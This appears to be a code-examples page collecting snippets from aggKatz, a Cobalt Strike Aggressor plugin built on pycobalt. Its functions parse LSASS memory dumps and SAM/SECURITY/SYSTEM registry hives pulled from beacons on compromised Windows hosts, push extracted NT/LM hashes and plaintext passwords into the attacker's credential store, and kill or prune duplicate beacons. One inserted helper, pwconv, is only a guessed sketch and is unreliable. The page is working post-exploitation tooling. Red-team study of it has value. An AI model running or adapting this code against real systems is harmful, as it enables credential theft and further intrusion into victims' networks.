                                           callback=registry_start_cb),
                              ]),
                 ])
gui.register(menu)

engine.message('')
engine.message('')
engine.message(
    '****************************************************************')
engine.message(
    '*                                                              *')
engine.message(
    '* aggKatz - pypyKatz Aggressor plugin powered by pycobalt      *')
engine.message(
    '*                                                              *')
engine.message(
    '*                                                              *')
engine.message(
    '* Author: Tamas Jos @skelsec                                   *')
engine.message(
    '* Sponsor: Sec-Consult                                         *')
Example #24
def parse_lsass(bid,
                filepath,
                boffilepath,
                chunksize,
                packages=['all'],
                outputs=['text'],
                to_delete=False,
                add_creds=True):

    engine.message('parse_lsass invoked')
    engine.message('bid %s' % bid)
    engine.message('filepath %s' % filepath)
    engine.message('chunksize %s' % chunksize)
    engine.message('packages %s' % (','.join(packages)))

    starttime = datetime.datetime.utcnow()
    bfile = BaconFileReader(bid, filepath, boffilepath, chunksize=chunksize)
    mimi = pypykatz.parse_minidump_external(bfile,
                                            chunksize=chunksize,
                                            packages=packages)
    engine.message(str(bfile))
    endtime = datetime.datetime.utcnow()
    runtime = (endtime - starttime).total_seconds()
    engine.message('TOTAL RUNTIME: %ss' % runtime)

    if 'text' in outputs:
        engine.message(str(mimi))
        aggressor.blog(bid, str(mimi))

    if 'json' in outputs:
        engine.message(mimi.to_json())
        aggressor.blog(bid, mimi.to_json())

    if 'grep' in outputs:
        engine.message(mimi.to_grep())
        aggressor.blog(bid, mimi.to_grep())

    if to_delete:
        engine.call('fdelete', [bid, boffilepath, filepath, 1])

    if add_creds:
        host = str(bid)
        for luid in mimi.logon_sessions:
            res = mimi.logon_sessions[luid].to_dict()
            for msv in res['msv_creds']:
                engine.message(repr(msv))
                if pwconv(msv['NThash']) is not None:
                    source = '[AGGROKATZ][%s][%s] LSASS dump %s' % (
                        'msv', 'NT', filepath)
                    aggressor.credential_add(str(msv['username']),
                                             pwconv(msv['NThash']),
                                             str(msv['domainname']), source,
                                             host)
                if pwconv(msv['LMHash']) is not None:
                    source = '[AGGROKATZ][%s][%s] LSASS dump %s' % (
                        'msv', 'LM', filepath)
                    aggressor.credential_add(str(msv['username']),
                                             pwconv(msv['LMHash']),
                                             str(msv['domainname']), source,
                                             host)

            for pkgt in [
                    'wdigest_creds', 'ssp_creds', 'livessp_creds',
                    'kerberos_creds', 'credman_creds', 'tspkg_creds'
            ]:
                for pkg in res[pkgt]:
                    if pwconv(pkg['password']) is not None:
                        source = '[AGGROKATZ][%s] LSASS dump %s' % (pkgt,
                                                                    filepath)
                        aggressor.credential_add(str(pkg['username']),
                                                 pwconv(pkg['password']),
                                                 str(pkg['domainname']),
                                                 source, host)
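parse_lsass() passes every hash or password through a pwconv() helper before calling credential_add(). The helper isn't shown; a plausible sketch, assuming it normalizes values to strings and drops empty ones, is:

def pwconv(value):
    # assumed helper: render hashes/passwords as strings, return None for empty values
    if value is None:
        return None
    if isinstance(value, bytes):
        value = value.hex()
    value = str(value).strip()
    return value if value else None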
Example #25
def parse_registry(bid,
                   boffilepath,
                   system_filepath,
                   sam_filepath=None,
                   security_filepath=None,
                   software_filepath=None,
                   chunksize=10240,
                   outputs=['text']):
    engine.message('parse_registry invoked')
    engine.message('bid %s' % bid)
    engine.message('system_filepath %s' % system_filepath)
    engine.message('sam_filepath %s' % sam_filepath)
    engine.message('security_filepath %s' % security_filepath)
    engine.message('software_filepath %s' % software_filepath)
    engine.message('chunksize %s' % chunksize)

    system_file = BaconFileReader(bid,
                                  system_filepath,
                                  boffilepath,
                                  chunksize=chunksize)
    sam_file = None
    if sam_filepath is not None and len(sam_filepath) > 0:
        sam_file = BaconFileReader(bid,
                                   sam_filepath,
                                   boffilepath,
                                   chunksize=chunksize)
    security_file = None
    if security_filepath is not None and len(security_filepath) > 0:
        security_file = BaconFileReader(bid,
                                        security_filepath,
                                        boffilepath,
                                        chunksize=chunksize)
    software_file = None
    if software_filepath is not None and len(software_filepath) > 0:
        software_file = BaconFileReader(bid,
                                        software_filepath,
                                        boffilepath,
                                        chunksize=chunksize)

    starttime = datetime.datetime.utcnow()
    po = OffineRegistry.from_files(system_file,
                                   sam_path=sam_file,
                                   security_path=security_file,
                                   software_path=software_file,
                                   notfile=True)
    endtime = datetime.datetime.utcnow()
    runtime = (endtime - starttime).total_seconds()
    engine.message('TOTAL RUNTIME: %ss' % runtime)

    engine.message(str(po))

    if 'text' in outputs:
        engine.message(str(po))
        aggressor.blog(bid, str(po))

    if 'json' in outputs:
        engine.message(po.to_json())
        aggressor.blog(bid, po.to_json())
Example #26
def beacon_output_handler(bid, text, timestamp):
    try:
        engine.message(
            'beacon_output_handler invoked. This should never happen!!!')
    except Exception as e:
        engine.message('CB ERROR! %s ' % e)
Example #27
def cleanup(hours=80, dry=True):
    # collect notes
    notes = collections.defaultdict(set)
    for beacon in aggressor.beacons():
        # skip 'killing'
        if beacon['note'] == 'killing':
            continue

        ident = '{}@{}'.format(beacon['user'], beacon['computer'])
        notes[ident].add(beacon['note'])

    # remove dead
    if not dry:
        prune_dead()
    else:
        engine.message('not pruning dead beacons')

    # remove old
    #if not dry:
    #    prune_old(int(hours))
    #else:
    #    engine.message('not pruning old beacons')

    # collect beacons
    by_ident = collections.defaultdict(list)
    for beacon in aggressor.beacons():
        # skip dead beacons
        if beacon['alive'] == 'false':
            continue

        ident = '{}@{}'.format(beacon['user'], beacon['computer'])
        by_ident[ident].append(beacon)

    # sort beacons by newest
    for ident, beacons in by_ident.items():
        beacons = sorted(beacons, key=lambda b: int(b['last']))
        by_ident[ident] = beacons

    # de-duplicate
    for ident, beacons in by_ident.items():
        if len(beacons) > 1:
            # pick a beacon to keep. to choose it we:
            #   - find all beacons with last times within 2 hours of the newest beacon
            #   - pick the newest beacon of those with a note
            #   - or: pick the newest beacon
            #newest_beacon = beacons[0]
            #for beacon in beacons[1:]:
            #    if last_difference(newest_beacon['last'], beacon['last']) > 1.0:
            #        if beacon['note']:
            #            # newest beacon with a note
            #            picked_beacon = beacon
            #            break
            #else:
            #    # newest beacon
            #    picked_beacon = beacons[0]

            picked_beacon = list(
                filter(lambda b: b['note'] != 'killing', beacons))[0]
            beacons.remove(picked_beacon)

            # kill or remove the other beacons
            for beacon in beacons:
                if {'keep', 'test'} & set(beacon['note'].split()):
                    # special note. don't kill
                    engine.message(
                        'not touching beacon with keep note {} {}'.format(
                            ident, beacon['note']))
                elif last_difference(picked_beacon['last'],
                                     beacon['last']) > 2.0:
                    # probably dead. just remove
                    engine.message('removing older beacon {} {}'.format(
                        ident, beacon['id']))
                    if not dry:
                        aggressor.beacon_remove(beacon['id'])
                else:
                    # kill and remove
                    engine.message('killing older beacon {} {}'.format(
                        ident, beacon['id']))
                    if not dry:
                        suicide(beacon['id'])

            # pick shortest note
            picked_note = None
            for note in notes[ident]:
                if not picked_note or len(picked_note) > len(note):
                    picked_note = note

            if picked_note:
                engine.message('{} picked note: {}'.format(ident, picked_note))
                if not dry:
                    aggressor.bnote(picked_beacon['id'], picked_note)
Example #28
def lsass_start_cb(bids):
    engine.message(len(bids))
    render_dialog_pypykatz_lsass(bids[0])
Example #29
def registry_start_cb(bids):
    engine.message(len(bids))
    engine.message('registry parse cb called!')
    render_dialog_pypykatz_registry(bids[0])
Example #30
def test_command():
    engine.message('test_command called')